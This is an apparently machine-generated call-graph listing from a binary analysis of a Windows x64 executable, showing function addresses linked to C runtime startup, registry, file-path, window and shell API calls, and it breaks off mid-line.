94693->94696 94695 7ff79f882c05 94697 7ff79f87ed75 94696->94697 94704 7ff79f87edcd 94696->94704 94699 7ff79f883c20 300 API calls 94697->94699 94697->94704 94701 7ff79f87eda8 94699->94701 94700 7ff79f8ca636 94702 7ff79f87edfe 94701->94702 94705 7ff79f87ee20 5 API calls Concurrency::wait 94701->94705 94702->94695 94704->94702 94706 7ff79f8f34e4 77 API calls 3 library calls 94704->94706 94705->94704 94706->94700 94707 7ff79f8aa2c4 94708 7ff79f8aa2dd 94707->94708 94709 7ff79f8aa2d9 94707->94709 94717 7ff79f8b3e9c GetEnvironmentStringsW 94708->94717 94712 7ff79f8aa2ea 94714 7ff79f8ab3c0 __free_lconv_num 15 API calls 94712->94714 94714->94709 94715 7ff79f8aa2f7 94725 7ff79f8ab3c0 94715->94725 94718 7ff79f8aa2e2 94717->94718 94719 7ff79f8b3ec0 94717->94719 94718->94712 94724 7ff79f8aa428 31 API calls 3 library calls 94718->94724 94719->94719 94731 7ff79f8ac51c 94719->94731 94721 7ff79f8b3ef2 memcpy_s 94722 7ff79f8ab3c0 __free_lconv_num 15 API calls 94721->94722 94723 7ff79f8b3f12 FreeEnvironmentStringsW 94722->94723 94723->94718 94724->94715 94726 7ff79f8ab3c5 RtlFreeHeap 94725->94726 94728 7ff79f8ab3f5 __free_lconv_num 94725->94728 94727 7ff79f8ab3e0 94726->94727 94726->94728 94740 7ff79f8a55d4 15 API calls abort 94727->94740 94728->94712 94730 7ff79f8ab3e5 GetLastError 94730->94728 94732 7ff79f8ac567 94731->94732 94736 7ff79f8ac52b abort 94731->94736 94739 7ff79f8a55d4 15 API calls abort 94732->94739 94734 7ff79f8ac54e HeapAlloc 94735 7ff79f8ac565 94734->94735 94734->94736 94735->94721 94736->94732 94736->94734 94738 7ff79f89925c EnterCriticalSection LeaveCriticalSection abort 94736->94738 94738->94736 94739->94735 94740->94730 94741 7ff79f882c17 94744 7ff79f8814a0 94741->94744 94743 7ff79f882c2a 94745 7ff79f8814d3 94744->94745 94746 7ff79f8cbe31 94745->94746 94749 7ff79f8cbdd1 94745->94749 94750 7ff79f8cbdf2 94745->94750 94775 7ff79f8814fa __scrt_get_show_window_mode 94745->94775 94794 7ff79f908f48 300 API calls 3 library calls 94746->94794 94752 7ff79f8cbddb 94749->94752 94749->94775 94751 7ff79f8cbe19 94750->94751 94792 7ff79f909a88 300 API calls 4 library calls 94750->94792 94793 7ff79f8f34e4 77 API calls 3 library calls 94751->94793 94791 7ff79f909514 300 API calls 94752->94791 94753 7ff79f881884 94780 7ff79f892130 45 API calls 94753->94780 94760 7ff79f881a30 45 API calls 94760->94775 94761 7ff79f881898 94761->94743 94768 7ff79f892130 45 API calls 94768->94775 94769 7ff79f8cbfe4 94797 7ff79f9093a4 77 API calls 94769->94797 94770 7ff79f881799 94778 7ff79f881815 94770->94778 94798 7ff79f8f34e4 77 API calls 3 library calls 94770->94798 94773 7ff79f883c20 300 API calls 94773->94775 94774 7ff79f87e0a8 4 API calls 94774->94775 94775->94753 94775->94760 94775->94768 94775->94769 94775->94770 94775->94773 94775->94774 94775->94778 94779 7ff79f87ef9c 46 API calls 94775->94779 94781 7ff79f8920d0 45 API calls 94775->94781 94782 7ff79f875af8 300 API calls 94775->94782 94783 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94775->94783 94784 7ff79f8935c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94775->94784 94785 7ff79f894f0c 94775->94785 94788 7ff79f8950b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94775->94788 94789 7ff79f8936c4 77 API calls 94775->94789 94790 7ff79f8937dc 300 API calls 94775->94790 94795 7ff79f87ee20 5 API calls Concurrency::wait 94775->94795 94796 7ff79f8dac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94775->94796 94778->94743 94779->94775 94780->94761 94781->94775 94782->94775 94784->94775 94799 7ff79f894ebc 94785->94799 94787 7ff79f894f15 94787->94775 94789->94775 94790->94775 94791->94778 94792->94751 94793->94746 94794->94775 94795->94775 94796->94775 94797->94770 94798->94770 94800 7ff79f894eeb 94799->94800 94802 7ff79f894ee1 _onexit 94799->94802 94803 7ff79f8aab08 34 API calls _onexit 94800->94803 94802->94787 94803->94802 94804 7ff79f895328 94829 7ff79f894cac 94804->94829 94807 7ff79f895474 94863 7ff79f8957e4 7 API calls 2 library calls 94807->94863 94808 7ff79f895344 94810 7ff79f89547e 94808->94810 94811 7ff79f895362 94808->94811 94864 7ff79f8957e4 7 API calls 2 library calls 94810->94864 94821 7ff79f8953a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94811->94821 94835 7ff79f8aae1c 94811->94835 94815 7ff79f895387 94817 7ff79f895489 abort 94818 7ff79f89540d 94846 7ff79f895930 94818->94846 94820 7ff79f895412 94849 7ff79f873730 94820->94849 94821->94818 94860 7ff79f899204 35 API calls pair 94821->94860 94826 7ff79f895435 94826->94817 94862 7ff79f894e90 8 API calls 2 library calls 94826->94862 94828 7ff79f89544c 94828->94815 94830 7ff79f894cce __scrt_initialize_crt 94829->94830 94865 7ff79f8965ec 94830->94865 94832 7ff79f894cd7 94832->94807 94832->94808 94833 7ff79f894cd3 __scrt_initialize_crt 94833->94832 94873 7ff79f896620 8 API calls 3 library calls 94833->94873 94837 7ff79f8aae34 94835->94837 94836 7ff79f895383 94836->94815 94839 7ff79f8aada4 94836->94839 94837->94836 94898 7ff79f895244 94837->94898 94840 7ff79f8aadff 94839->94840 94841 7ff79f8aade0 94839->94841 94840->94821 94841->94840 94957 7ff79f8710e8 94841->94957 94962 7ff79f871064 94841->94962 94967 7ff79f871080 94841->94967 94972 7ff79f871048 94841->94972 95166 7ff79f896240 94846->95166 94850 7ff79f8737a3 94849->94850 94851 7ff79f873743 IsThemeActive 94849->94851 94861 7ff79f895974 GetModuleHandleW 94850->94861 95168 7ff79f8992d0 94851->95168 94857 7ff79f87377d 95180 7ff79f8737b0 94857->95180 94859 7ff79f873785 SystemParametersInfoW 94859->94850 94860->94818 94861->94826 94862->94828 94863->94810 94864->94817 94866 7ff79f8965f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94865->94866 94874 7ff79f897290 94866->94874 94869 7ff79f896603 94869->94833 94871 7ff79f89660c 94871->94869 94881 7ff79f8972d8 DeleteCriticalSection 94871->94881 94873->94832 94875 7ff79f897298 94874->94875 94877 7ff79f8972c9 94875->94877 94878 7ff79f8965ff 94875->94878 94882 7ff79f897614 94875->94882 94887 7ff79f8972d8 DeleteCriticalSection 94877->94887 94878->94869 94880 7ff79f897218 8 API calls 3 library calls 94878->94880 94880->94871 94881->94869 94888 7ff79f897310 94882->94888 94885 7ff79f89765f InitializeCriticalSectionAndSpinCount 94886 7ff79f897654 94885->94886 94886->94875 94887->94878 94889 7ff79f897371 94888->94889 94896 7ff79f89736c try_get_function 94888->94896 94889->94885 94889->94886 94890 7ff79f897454 94890->94889 94893 7ff79f897462 GetProcAddress 94890->94893 94891 7ff79f8973a0 LoadLibraryExW 94892 7ff79f8973c1 GetLastError 94891->94892 94891->94896 94892->94896 94894 7ff79f897473 94893->94894 94894->94889 94895 7ff79f897439 FreeLibrary 94895->94896 94896->94889 94896->94890 94896->94891 94896->94895 94897 7ff79f8973fb LoadLibraryExW 94896->94897 94897->94896 94899 7ff79f895254 94898->94899 94915 7ff79f8a2584 94899->94915 94901 7ff79f895260 94921 7ff79f894cf8 94901->94921 94903 7ff79f895279 _RTC_Initialize 94906 7ff79f894f0c __scrt_initialize_thread_safe_statics 34 API calls 94903->94906 94913 7ff79f8952ce 94903->94913 94905 7ff79f8952fa __scrt_initialize_default_local_stdio_options 94905->94837 94907 7ff79f89528e 94906->94907 94926 7ff79f8aa09c 94907->94926 94911 7ff79f8952a3 94912 7ff79f8aaebc 35 API calls 94911->94912 94912->94913 94914 7ff79f8952ea 94913->94914 94949 7ff79f8957e4 7 API calls 2 library calls 94913->94949 94914->94837 94916 7ff79f8a2595 94915->94916 94918 7ff79f8a259d 94916->94918 94950 7ff79f8a55d4 15 API calls abort 94916->94950 94918->94901 94919 7ff79f8a25ac 94951 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 94919->94951 94922 7ff79f894d0d 94921->94922 94925 7ff79f894d16 __scrt_initialize_onexit_tables __scrt_release_startup_lock 94921->94925 94922->94925 94952 7ff79f8957e4 7 API calls 2 library calls 94922->94952 94924 7ff79f894dcf 94925->94903 94927 7ff79f8aa0d0 GetModuleFileNameW 94926->94927 94928 7ff79f8aa0ba 94926->94928 94932 7ff79f8aa0fd 94927->94932 94953 7ff79f8a55d4 15 API calls abort 94928->94953 94930 7ff79f8aa0bf 94954 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 94930->94954 94955 7ff79f8aa038 15 API calls 2 library calls 94932->94955 94933 7ff79f89529a 94933->94913 94948 7ff79f895ac4 InitializeSListHead 94933->94948 94935 7ff79f8aa13d 94936 7ff79f8aa145 94935->94936 94938 7ff79f8aa156 94935->94938 94956 7ff79f8a55d4 15 API calls abort 94936->94956 94940 7ff79f8aa1a2 94938->94940 94941 7ff79f8aa1bb 94938->94941 94946 7ff79f8aa14a 94938->94946 94939 7ff79f8ab3c0 __free_lconv_num 15 API calls 94939->94933 94942 7ff79f8ab3c0 __free_lconv_num 15 API calls 94940->94942 94944 7ff79f8ab3c0 __free_lconv_num 15 API calls 94941->94944 94943 7ff79f8aa1ab 94942->94943 94945 7ff79f8ab3c0 __free_lconv_num 15 API calls 94943->94945 94944->94946 94947 7ff79f8aa1b7 94945->94947 94946->94939 94947->94933 94949->94905 94950->94919 94951->94918 94952->94924 94953->94930 94954->94933 94955->94935 94956->94946 94977 7ff79f891d80 94957->94977 94960 7ff79f894ebc _onexit 34 API calls 94961 7ff79f894f15 94960->94961 94961->94841 95001 7ff79f877ec0 94962->95001 94964 7ff79f87106d 94965 7ff79f894ebc _onexit 34 API calls 94964->94965 94966 7ff79f894f15 94965->94966 94966->94841 95085 7ff79f877920 94967->95085 94969 7ff79f87109e 94970 7ff79f894ebc _onexit 34 API calls 94969->94970 94971 7ff79f894f15 94970->94971 94971->94841 95148 7ff79f877718 94972->95148 94975 7ff79f894ebc _onexit 34 API calls 94976 7ff79f894f15 94975->94976 94976->94841 94978 7ff79f879640 4 API calls 94977->94978 94979 7ff79f891db2 GetVersionExW 94978->94979 94980 7ff79f877cf4 4 API calls 94979->94980 94982 7ff79f891dfc 94980->94982 94981 7ff79f87dda4 4 API calls 94981->94982 94982->94981 94983 7ff79f891e87 94982->94983 94984 7ff79f87dda4 4 API calls 94983->94984 94985 7ff79f891ea4 94984->94985 94986 7ff79f8d9645 94985->94986 94988 7ff79f891f3c GetCurrentProcess IsWow64Process 94985->94988 94987 7ff79f8d964f 94986->94987 94999 7ff79f8e32f4 LoadLibraryA GetProcAddress 94987->94999 94989 7ff79f891f7e __scrt_get_show_window_mode 94988->94989 94989->94987 94991 7ff79f891f86 GetSystemInfo 94989->94991 94993 7ff79f8710f1 94991->94993 94992 7ff79f8d96b1 94994 7ff79f8d96b5 94992->94994 94995 7ff79f8d96d7 GetSystemInfo 94992->94995 94993->94960 95000 7ff79f8e32f4 LoadLibraryA GetProcAddress 94994->95000 94997 7ff79f8d96bf 94995->94997 94997->94993 94998 7ff79f8d96f0 FreeLibrary 94997->94998 94998->94993 94999->94992 95000->94997 95037 7ff79f8782b4 95001->95037 95004 7ff79f8782b4 4 API calls 95005 7ff79f877f3a 95004->95005 95006 7ff79f879640 4 API calls 95005->95006 95007 7ff79f877f46 95006->95007 95008 7ff79f877cf4 4 API calls 95007->95008 95009 7ff79f877f59 95008->95009 95044 7ff79f892d5c 6 API calls 95009->95044 95011 7ff79f877fa5 95012 7ff79f879640 4 API calls 95011->95012 95013 7ff79f877fb1 95012->95013 95014 7ff79f879640 4 API calls 95013->95014 95015 7ff79f877fbd 95014->95015 95016 7ff79f879640 4 API calls 95015->95016 95017 7ff79f877fc9 95016->95017 95018 7ff79f879640 4 API calls 95017->95018 95019 7ff79f87800f 95018->95019 95020 7ff79f879640 4 API calls 95019->95020 95021 7ff79f8780f7 95020->95021 95045 7ff79f88ef88 95021->95045 95023 7ff79f878103 95052 7ff79f88eec8 95023->95052 95025 7ff79f87812f 95026 7ff79f879640 4 API calls 95025->95026 95027 7ff79f87813b 95026->95027 95063 7ff79f886d40 95027->95063 95031 7ff79f8781ac 95032 7ff79f8781be GetStdHandle 95031->95032 95033 7ff79f878220 OleInitialize 95032->95033 95034 7ff79f8bd350 95032->95034 95033->94964 95080 7ff79f8effc8 CreateThread 95034->95080 95036 7ff79f8bd367 CloseHandle 95038 7ff79f879640 4 API calls 95037->95038 95039 7ff79f8782c6 95038->95039 95040 7ff79f879640 4 API calls 95039->95040 95041 7ff79f8782cf 95040->95041 95042 7ff79f879640 4 API calls 95041->95042 95043 7ff79f877f2e 95042->95043 95043->95004 95044->95011 95046 7ff79f879640 4 API calls 95045->95046 95047 7ff79f88efa3 95046->95047 95048 7ff79f879640 4 API calls 95047->95048 95049 7ff79f88efac 95048->95049 95050 7ff79f879640 4 API calls 95049->95050 95051 7ff79f88f02e 95050->95051 95051->95023 95053 7ff79f88eede 95052->95053 95054 7ff79f879640 4 API calls 95053->95054 95055 7ff79f88eeea 95054->95055 95056 7ff79f879640 4 API calls 95055->95056 95057 7ff79f88eef6 95056->95057 95058 7ff79f879640 4 API calls 95057->95058 95059 7ff79f88ef02 95058->95059 95060 7ff79f879640 4 API calls 95059->95060 95061 7ff79f88ef0e 95060->95061 95062 7ff79f88ef68 RegisterWindowMessageW 95061->95062 95062->95025 95064 7ff79f886db9 95063->95064 95071 7ff79f886d80 95063->95071 95081 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95064->95081 95072 7ff79f87816b 95071->95072 95082 7ff79f895114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95071->95082 95073 7ff79f8939a8 95072->95073 95074 7ff79f8da502 95073->95074 95079 7ff79f8939cc 95073->95079 95083 7ff79f87ee20 5 API calls Concurrency::wait 95074->95083 95076 7ff79f8da50e 95084 7ff79f87ee20 5 API calls Concurrency::wait 95076->95084 95078 7ff79f8da52d 95079->95031 95080->95036 95083->95076 95084->95078 95086 7ff79f877948 wcsftime 95085->95086 95087 7ff79f879640 4 API calls 95086->95087 95088 7ff79f877a02 95087->95088 95115 7ff79f875680 95088->95115 95090 7ff79f877a0c 95122 7ff79f893a38 95090->95122 95093 7ff79f8771f8 4 API calls 95094 7ff79f877a2c 95093->95094 95128 7ff79f874680 95094->95128 95096 7ff79f877a3d 95097 7ff79f879640 4 API calls 95096->95097 95098 7ff79f877a47 95097->95098 95132 7ff79f87a854 95098->95132 95101 7ff79f8bd05c RegQueryValueExW 95102 7ff79f8bd131 RegCloseKey 95101->95102 95103 7ff79f8bd08f 95101->95103 95106 7ff79f877a83 Concurrency::wait 95102->95106 95114 7ff79f8bd147 wcscat Concurrency::wait 95102->95114 95104 7ff79f894c68 4 API calls 95103->95104 95105 7ff79f8bd0b2 95104->95105 95107 7ff79f8bd0bf RegQueryValueExW 95105->95107 95106->94969 95108 7ff79f8bd0f3 95107->95108 95111 7ff79f8bd112 95107->95111 95109 7ff79f877cf4 4 API calls 95108->95109 95109->95111 95110 7ff79f879d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95110->95114 95111->95102 95112 7ff79f87ec00 4 API calls 95112->95114 95113 7ff79f874680 4 API calls 95113->95114 95114->95106 95114->95110 95114->95112 95114->95113 95136 7ff79f8b8f90 95115->95136 95118 7ff79f87ec00 4 API calls 95119 7ff79f8756b4 95118->95119 95138 7ff79f8756d4 95119->95138 95121 7ff79f8756c1 Concurrency::wait 95121->95090 95123 7ff79f8b8f90 wcsftime 95122->95123 95124 7ff79f893a44 GetFullPathNameW 95123->95124 95125 7ff79f893a74 95124->95125 95126 7ff79f877cf4 4 API calls 95125->95126 95127 7ff79f877a1b 95126->95127 95127->95093 95129 7ff79f87469f 95128->95129 95131 7ff79f8746c8 memcpy_s 95128->95131 95130 7ff79f894c68 4 API calls 95129->95130 95130->95131 95131->95096 95133 7ff79f87a87a 95132->95133 95135 7ff79f877a51 RegOpenKeyExW 95132->95135 95134 7ff79f894c68 4 API calls 95133->95134 95134->95135 95135->95101 95135->95106 95137 7ff79f87568c GetModuleFileNameW 95136->95137 95137->95118 95139 7ff79f8b8f90 wcsftime 95138->95139 95140 7ff79f8756e9 GetFullPathNameW 95139->95140 95141 7ff79f8bc03a 95140->95141 95142 7ff79f875712 95140->95142 95144 7ff79f87a854 4 API calls 95141->95144 95143 7ff79f877cf4 4 API calls 95142->95143 95145 7ff79f87571c 95143->95145 95144->95145 95145->95145 95146 7ff79f87dda4 4 API calls 95145->95146 95147 7ff79f875785 95146->95147 95147->95121 95149 7ff79f879640 4 API calls 95148->95149 95150 7ff79f87778f 95149->95150 95155 7ff79f876f24 95150->95155 95153 7ff79f87782c 95154 7ff79f871051 95153->95154 95158 7ff79f877410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95153->95158 95154->94975 95159 7ff79f876f60 95155->95159 95158->95153 95160 7ff79f876f85 95159->95160 95161 7ff79f876f52 95159->95161 95160->95161 95162 7ff79f876f93 RegOpenKeyExW 95160->95162 95161->95153 95162->95161 95163 7ff79f876faf RegQueryValueExW 95162->95163 95164 7ff79f876ff5 RegCloseKey 95163->95164 95165 7ff79f876fdd 95163->95165 95164->95161 95165->95164 95167 7ff79f895947 GetStartupInfoW 95166->95167 95167->94820 95226 7ff79f8ab9bc EnterCriticalSection 95168->95226 95170 7ff79f8992e4 95171 7ff79f8aba10 _isindst LeaveCriticalSection 95170->95171 95172 7ff79f87376e 95171->95172 95173 7ff79f899334 95172->95173 95174 7ff79f89933d 95173->95174 95178 7ff79f873778 95173->95178 95227 7ff79f8a55d4 15 API calls abort 95174->95227 95176 7ff79f899342 95228 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95176->95228 95179 7ff79f8736e8 SystemParametersInfoW SystemParametersInfoW 95178->95179 95179->94857 95181 7ff79f8737cd wcsftime 95180->95181 95182 7ff79f879640 4 API calls 95181->95182 95183 7ff79f8737dd GetCurrentDirectoryW 95182->95183 95229 7ff79f8757a0 95183->95229 95185 7ff79f873807 IsDebuggerPresent 95186 7ff79f8bb872 MessageBoxA 95185->95186 95187 7ff79f873815 95185->95187 95188 7ff79f8bb894 95186->95188 95187->95188 95189 7ff79f873839 95187->95189 95339 7ff79f87e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95188->95339 95303 7ff79f873f04 95189->95303 95193 7ff79f873860 GetFullPathNameW 95194 7ff79f877cf4 4 API calls 95193->95194 95195 7ff79f8738a6 95194->95195 95319 7ff79f873f9c 95195->95319 95196 7ff79f8738bf 95198 7ff79f8bb8dc SetCurrentDirectoryW 95196->95198 95199 7ff79f8738c7 95196->95199 95198->95199 95200 7ff79f8738d0 95199->95200 95340 7ff79f8dd540 AllocateAndInitializeSid CheckTokenMembership FreeSid 95199->95340 95335 7ff79f873b84 7 API calls 95200->95335 95203 7ff79f8bb8f8 95203->95200 95206 7ff79f8bb90c 95203->95206 95208 7ff79f875680 6 API calls 95206->95208 95207 7ff79f8738da 95210 7ff79f876258 46 API calls 95207->95210 95213 7ff79f8738ef 95207->95213 95209 7ff79f8bb916 95208->95209 95211 7ff79f87ec00 4 API calls 95209->95211 95210->95213 95212 7ff79f8bb927 95211->95212 95215 7ff79f8bb930 95212->95215 95216 7ff79f8bb94d 95212->95216 95214 7ff79f873913 95213->95214 95217 7ff79f875d88 Shell_NotifyIconW 95213->95217 95219 7ff79f87391f SetCurrentDirectoryW 95214->95219 95218 7ff79f8771f8 4 API calls 95215->95218 95220 7ff79f8771f8 4 API calls 95216->95220 95217->95214 95222 7ff79f8bb93c 95218->95222 95221 7ff79f873934 Concurrency::wait 95219->95221 95223 7ff79f8bb963 GetForegroundWindow ShellExecuteW 95220->95223 95221->94859 95341 7ff79f877c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95222->95341 95225 7ff79f8bb99f Concurrency::wait 95223->95225 95225->95214 95227->95176 95228->95178 95230 7ff79f879640 4 API calls 95229->95230 95231 7ff79f8757d7 95230->95231 95342 7ff79f879bbc 95231->95342 95233 7ff79f8757fe 95234 7ff79f875680 6 API calls 95233->95234 95235 7ff79f875812 95234->95235 95236 7ff79f87ec00 4 API calls 95235->95236 95237 7ff79f875823 95236->95237 95356 7ff79f876460 95237->95356 95240 7ff79f87584e Concurrency::wait 95245 7ff79f87e0a8 4 API calls 95240->95245 95241 7ff79f8bc05e 95429 7ff79f8f2948 95241->95429 95243 7ff79f8bc074 95244 7ff79f8bc081 95243->95244 95246 7ff79f87652c 63 API calls 95243->95246 95447 7ff79f87652c 95244->95447 95247 7ff79f87586a 95245->95247 95246->95244 95249 7ff79f87ec00 4 API calls 95247->95249 95250 7ff79f875888 95249->95250 95254 7ff79f8bc099 95250->95254 95382 7ff79f87eff8 95250->95382 95252 7ff79f8758ad Concurrency::wait 95253 7ff79f87ec00 4 API calls 95252->95253 95255 7ff79f8758d7 95253->95255 95257 7ff79f875ab4 4 API calls 95254->95257 95255->95254 95256 7ff79f87eff8 46 API calls 95255->95256 95259 7ff79f8758fc Concurrency::wait 95256->95259 95258 7ff79f8bc0e1 95257->95258 95260 7ff79f875ab4 4 API calls 95258->95260 95262 7ff79f879640 4 API calls 95259->95262 95261 7ff79f8bc103 95260->95261 95265 7ff79f875680 6 API calls 95261->95265 95263 7ff79f87591f 95262->95263 95395 7ff79f875ab4 95263->95395 95267 7ff79f8bc12b 95265->95267 95269 7ff79f875ab4 4 API calls 95267->95269 95272 7ff79f8bc139 95269->95272 95270 7ff79f875941 95270->95254 95271 7ff79f875949 95270->95271 95273 7ff79f898e28 wcsftime 37 API calls 95271->95273 95274 7ff79f87e0a8 4 API calls 95272->95274 95276 7ff79f875958 95273->95276 95275 7ff79f8bc14a 95274->95275 95277 7ff79f875ab4 4 API calls 95275->95277 95276->95258 95278 7ff79f875960 95276->95278 95279 7ff79f8bc15b 95277->95279 95280 7ff79f898e28 wcsftime 37 API calls 95278->95280 95283 7ff79f87e0a8 4 API calls 95279->95283 95281 7ff79f87596f 95280->95281 95281->95261 95282 7ff79f875977 95281->95282 95284 7ff79f898e28 wcsftime 37 API calls 95282->95284 95285 7ff79f8bc172 95283->95285 95286 7ff79f875986 95284->95286 95287 7ff79f875ab4 4 API calls 95285->95287 95288 7ff79f8759c6 95286->95288 95291 7ff79f875ab4 4 API calls 95286->95291 95290 7ff79f8bc183 95287->95290 95288->95279 95289 7ff79f8759d3 95288->95289 95418 7ff79f87df90 95289->95418 95292 7ff79f8759a8 95291->95292 95293 7ff79f87e0a8 4 API calls 95292->95293 95295 7ff79f8759b5 95293->95295 95297 7ff79f875ab4 4 API calls 95295->95297 95297->95288 95299 7ff79f875a12 95300 7ff79f87d670 5 API calls 95299->95300 95301 7ff79f875ab4 4 API calls 95299->95301 95302 7ff79f875a60 Concurrency::wait 95299->95302 95300->95299 95301->95299 95302->95185 95304 7ff79f873f29 wcsftime 95303->95304 95305 7ff79f873f4b 95304->95305 95306 7ff79f8bba2c __scrt_get_show_window_mode 95304->95306 95307 7ff79f8756d4 5 API calls 95305->95307 95308 7ff79f8bba4d GetOpenFileNameW 95306->95308 95309 7ff79f873f56 95307->95309 95310 7ff79f873858 95308->95310 95311 7ff79f8bbab0 95308->95311 95791 7ff79f873eb4 95309->95791 95310->95193 95310->95196 95313 7ff79f877cf4 4 API calls 95311->95313 95315 7ff79f8bbabc 95313->95315 95317 7ff79f873f6c 95809 7ff79f876394 95317->95809 95320 7ff79f873fb6 wcsftime 95319->95320 95852 7ff79f879734 95320->95852 95322 7ff79f873fc4 95323 7ff79f874050 95322->95323 95862 7ff79f874d28 77 API calls 95322->95862 95323->95196 95325 7ff79f873fd3 95325->95323 95863 7ff79f874b0c 79 API calls Concurrency::wait 95325->95863 95327 7ff79f873fe0 95327->95323 95328 7ff79f873fe8 GetFullPathNameW 95327->95328 95329 7ff79f877cf4 4 API calls 95328->95329 95330 7ff79f874014 95329->95330 95331 7ff79f877cf4 4 API calls 95330->95331 95332 7ff79f874028 95331->95332 95333 7ff79f8bbac2 wcscat 95332->95333 95334 7ff79f877cf4 4 API calls 95332->95334 95334->95323 95867 7ff79f873d90 7 API calls 95335->95867 95337 7ff79f8738d5 95338 7ff79f873cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95337->95338 95339->95196 95340->95203 95341->95216 95343 7ff79f879be5 wcsftime 95342->95343 95344 7ff79f877cf4 4 API calls 95343->95344 95345 7ff79f879c1b 95343->95345 95344->95345 95353 7ff79f879c4a Concurrency::wait 95345->95353 95453 7ff79f879d84 95345->95453 95347 7ff79f87ec00 4 API calls 95348 7ff79f879d4a 95347->95348 95350 7ff79f874680 4 API calls 95348->95350 95349 7ff79f87ec00 4 API calls 95349->95353 95351 7ff79f879d57 Concurrency::wait 95350->95351 95351->95233 95352 7ff79f874680 4 API calls 95352->95353 95353->95349 95353->95352 95354 7ff79f879d21 95353->95354 95355 7ff79f879d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95353->95355 95354->95347 95354->95351 95355->95353 95456 7ff79f876d64 95356->95456 95359 7ff79f876d64 2 API calls 95362 7ff79f87649d 95359->95362 95360 7ff79f8764ba FreeLibrary 95361 7ff79f8764c0 95360->95361 95460 7ff79f8a48e0 95361->95460 95362->95360 95362->95361 95365 7ff79f8764db LoadLibraryExW 95479 7ff79f876cc4 95365->95479 95366 7ff79f8bc8f6 95367 7ff79f87652c 63 API calls 95366->95367 95369 7ff79f8bc8fe 95367->95369 95372 7ff79f876cc4 3 API calls 95369->95372 95374 7ff79f8bc907 95372->95374 95373 7ff79f876505 95373->95374 95375 7ff79f876512 95373->95375 95501 7ff79f8767d8 95374->95501 95376 7ff79f87652c 63 API calls 95375->95376 95378 7ff79f875846 95376->95378 95378->95240 95378->95241 95381 7ff79f8bc93f 95704 7ff79f881a30 95382->95704 95384 7ff79f87f029 95385 7ff79f8ca7a8 95384->95385 95386 7ff79f87f040 95384->95386 95720 7ff79f87ee20 5 API calls Concurrency::wait 95385->95720 95389 7ff79f894c68 4 API calls 95386->95389 95388 7ff79f8ca7bc 95390 7ff79f87f066 95389->95390 95391 7ff79f87f08f 95390->95391 95719 7ff79f87f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95390->95719 95715 7ff79f87f1bc 95391->95715 95394 7ff79f87f0c6 95394->95252 95396 7ff79f875ac6 95395->95396 95397 7ff79f875ae4 95395->95397 95399 7ff79f87e0a8 4 API calls 95396->95399 95398 7ff79f877cf4 4 API calls 95397->95398 95400 7ff79f87592d 95398->95400 95399->95400 95401 7ff79f898e28 95400->95401 95402 7ff79f898ea4 95401->95402 95403 7ff79f898e3f 95401->95403 95724 7ff79f898d98 35 API calls 2 library calls 95402->95724 95410 7ff79f898e63 95403->95410 95722 7ff79f8a55d4 15 API calls abort 95403->95722 95406 7ff79f898ed6 95408 7ff79f898ee2 95406->95408 95416 7ff79f898ef9 95406->95416 95407 7ff79f898e49 95723 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95407->95723 95725 7ff79f8a55d4 15 API calls abort 95408->95725 95410->95270 95412 7ff79f898e54 95412->95270 95413 7ff79f898ee7 95726 7ff79f8ab164 31 API calls _invalid_parameter_noinfo 95413->95726 95414 7ff79f8a2c80 37 API calls wcsftime 95414->95416 95416->95414 95417 7ff79f898ef2 95416->95417 95417->95270 95420 7ff79f87dfac 95418->95420 95419 7ff79f894c68 4 API calls 95421 7ff79f8759f5 95419->95421 95420->95419 95420->95421 95422 7ff79f87d670 95421->95422 95423 7ff79f87d698 95422->95423 95428 7ff79f87d6a2 95423->95428 95727 7ff79f87880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95423->95727 95426 7ff79f8c9d43 95427 7ff79f87d7de 95427->95299 95428->95427 95728 7ff79f87ee20 5 API calls Concurrency::wait 95428->95728 95430 7ff79f8f29c8 95429->95430 95729 7ff79f8f2b70 95430->95729 95433 7ff79f8767d8 45 API calls 95434 7ff79f8f2a03 95433->95434 95435 7ff79f8767d8 45 API calls 95434->95435 95436 7ff79f8f2a23 95435->95436 95437 7ff79f8767d8 45 API calls 95436->95437 95438 7ff79f8f2a49 95437->95438 95439 7ff79f8767d8 45 API calls 95438->95439 95440 7ff79f8f2a6d 95439->95440 95441 7ff79f8767d8 45 API calls 95440->95441 95442 7ff79f8f2ac5 95441->95442 95443 7ff79f8f240c 32 API calls 95442->95443 95444 7ff79f8f2ada 95443->95444 95446 7ff79f8f29de 95444->95446 95734 7ff79f8f1d48 95444->95734 95446->95243 95448 7ff79f87653d 95447->95448 95449 7ff79f876542 95447->95449 95450 7ff79f8a4970 62 API calls 95448->95450 95451 7ff79f876558 95449->95451 95452 7ff79f87656f FreeLibrary 95449->95452 95450->95449 95451->95254 95452->95451 95454 7ff79f87a7c0 4 API calls 95453->95454 95455 7ff79f879d99 95454->95455 95455->95345 95457 7ff79f876490 95456->95457 95458 7ff79f876d74 LoadLibraryA 95456->95458 95457->95359 95457->95362 95458->95457 95459 7ff79f876d89 GetProcAddress 95458->95459 95459->95457 95461 7ff79f8a47fc 95460->95461 95462 7ff79f8a482a 95461->95462 95464 7ff79f8a485c 95461->95464 95521 